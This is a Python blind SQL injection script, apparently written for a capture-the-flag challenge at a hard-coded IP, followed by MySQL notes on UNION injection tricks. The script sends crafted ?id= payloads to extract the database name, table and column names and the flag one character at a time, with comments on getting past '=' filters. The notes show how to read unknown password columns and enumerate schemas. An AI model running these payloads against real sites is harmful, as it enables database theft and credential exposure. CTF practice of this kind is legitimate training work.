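url = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php'
# One Session so cookies (if the target sets any) persist across the hundreds
# of probe requests this script sends.
s = requests.Session()
# Candidate alphabet for character-by-character extraction. Any character of
# the target string that is NOT in this set ('.', '@', '#', ' ', ...) stops
# extraction at that position, because no candidate can match. Characters that
# need URL encoding ('+', '%', '&', '#') must be escaped before being placed in
# the query string; '+' is handled below.
str_all = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}_+-*/="


def database(max_len=9):
    """Extract the current database name with a boolean-based blind injection.

    Oracle: the response body contains 'hello' when the injected if() yields 1.
    MySQL's lpad(x, i, '1') returns the first i characters of x when x is at
    least i long (and left-pads with '1' otherwise), so the i-th character is
    confirmed by comparing that prefix against the already-known prefix plus
    one candidate. The `in('...')` comparison uses the connection's default
    collation, so letter case of the result is only reliable if that collation
    is binary/case-sensitive. `-- -` closes the query; the trailing '-' keeps
    the space after `--` from being trimmed.

    max_len: maximum number of positions to probe (1..max_len).
    Returns the extracted name ('' if the oracle never fired).
    """
    data = ''
    payload = "?id=1'and if(lpad((select database()),{},1)in('{}'),1,0)-- -"
    for i in range(1, max_len + 1):
        print(i)
        matched = False
        for c in str_all:
            # PHP decodes a raw '+' in the query string as a space and requests
            # sends '+' unencoded, so escape it or the '+' candidate is never
            # really tested.
            candidate = (data + c).replace('+', '%2B')
            payload_url = url + payload.format(i, candidate)
            # Bounded wait: a hung request would otherwise stall the whole run.
            res = s.get(payload_url, timeout=10)
            if 'hello' in res.text:
                data = data + c
                print(data)
                matched = True
                break
        if not matched:
            # No candidate matched at this position: either the string ended
            # (lpad now pads with '1' and can never equal data+c) or it holds a
            # character outside str_all. Probing further positions is useless.
            break
    return data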
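def table(max_len=29):
    """Extract the name of the second table (limit 1,1) of the target schema.

    The schema is selected with `between 'ctf' and 'CTF'` rather than `=`,
    presumably to get past a filter on '='; with a case-insensitive collation
    the two bounds compare equal, so this behaves like `= 'ctf'`. Change the
    `limit` offset to enumerate other tables. Same 'hello' oracle and lpad()
    prefix comparison as database(); case of the result is only reliable under
    a binary collation.

    max_len: maximum number of positions to probe (1..max_len).
    Returns the extracted table name ('' if the oracle never fired).
    """
    data = ''
    payload = "?id=1'and if(lpad((select table_name from information_schema.tables where table_schema between 'ctf' and 'CTF' limit 1,1),{},1)in('{}'),1,0)-- -"
    for i in range(1, max_len + 1):
        print(i)
        matched = False
        for c in str_all:
            # '+' would be decoded as a space by PHP; escape it explicitly.
            candidate = (data + c).replace('+', '%2B')
            payload_url = url + payload.format(i, candidate)
            res = s.get(payload_url, timeout=10)
            if 'hello' in res.text:
                data = data + c
                print(data)
                matched = True
                break
        if not matched:
            # End of string, or a character outside str_all: stop probing.
            break
    return data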
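def column(max_len=9):
    """Extract a column name of table fla49 via the same blind-injection oracle.

    NOTE(review): the subquery has no `limit`. If fla49 has more than one
    column, the scalar subquery returns several rows, MySQL raises an error and
    the oracle never fires (nothing is extracted). Add `limit 0,1` to the
    subquery and step the offset to enumerate columns. `between 'fla49' and
    'FLA49'` presumably sidesteps a filter on '='. Case of the result is only
    reliable under a binary collation.

    max_len: maximum number of positions to probe (1..max_len).
    Returns the extracted column name ('' if the oracle never fired).
    """
    data = ''
    payload = "?id=1'and if(lpad((select column_name from information_schema.columns where table_name between 'fla49' and 'FLA49'),{},1)in('{}'),1,0)-- -"
    for i in range(1, max_len + 1):
        print(i)
        matched = False
        for c in str_all:
            # '+' would be decoded as a space by PHP; escape it explicitly.
            candidate = (data + c).replace('+', '%2B')
            payload_url = url + payload.format(i, candidate)
            res = s.get(payload_url, timeout=10)
            if 'hello' in res.text:
                data = data + c
                print(data)
                matched = True
                break
        if not matched:
            # End of string, or a character outside str_all: stop probing.
            break
    return data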
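def get_flag(max_len=39):
    """Extract the concatenated contents of fla49.flag character by character.

    `binary` makes the `in('...')` comparison case-sensitive, so unlike the
    schema-enumeration helpers the letter case recovered here is exact.
    group_concat() joins all rows with ',' -- note ',' is not in str_all, so
    extraction stops at the first row boundary if there are several rows.

    max_len: maximum number of positions to probe (1..max_len).
    Returns the extracted string ('' if the oracle never fired).
    """
    data = ''
    payload = "?id=1'and if(lpad((select binary group_concat(flag) from fla49),{},1)in('{}'),1,0)-- -"
    for i in range(1, max_len + 1):
        print(i)
        matched = False
        for c in str_all:
            # '+' would be decoded as a space by PHP; escape it explicitly.
            candidate = (data + c).replace('+', '%2B')
            payload_url = url + payload.format(i, candidate)
            res = s.get(payload_url, timeout=10)
            if 'hello' in res.text:
                data = data + c
                print(data)
                matched = True
                break
        if not matched:
            # End of string, or a character outside str_all: stop probing.
            break
    return data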
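-- UNION-injection helpers for the case where the target's column names are
-- unknown or filtered (MySQL: LIMIT/OFFSET, information_schema). The trick:
-- alias a positional column in a dummy first UNION branch, then reference that
-- alias from an outer query. SELECT * is deliberate -- the real column names
-- are exactly what we do not have. ('//' is not a comment marker in MySQL;
-- the original notes used it.)

-- Column-count probe: the UNION below only succeeds if users has 4 columns.
select 1,2,3,4;
select 1,2,3,4 union select * from users;

-- Name the third positional column 'passwd' in the dummy row; the outer query
-- can then read users' third column without knowing its real name. The dummy
-- row (3) is returned as well.
select passwd
from (select 1,2,3 as passwd, 4 union select * from users) as twoname;

-- Same idea with the alias written as `(3)passwd` (no AS keyword, presumably
-- for filters that block `as`); LIMIT 1 OFFSET 1 skips the dummy row and
-- returns the first real row only.
select twoname.passwd
from (select 1,2,(3)passwd,4 union select * from think_user)twoname
limit 1 offset 1;

-- Enumerate databases the same way: alias the fourth column as `data` and
-- union it with schema_name from information_schema.schemata (the dummy '4'
-- row comes back first).
select data
from (
    select 1,2,3,(4)data
    union
    select 1,2,3,schema_name from information_schema.schemata
) as tt;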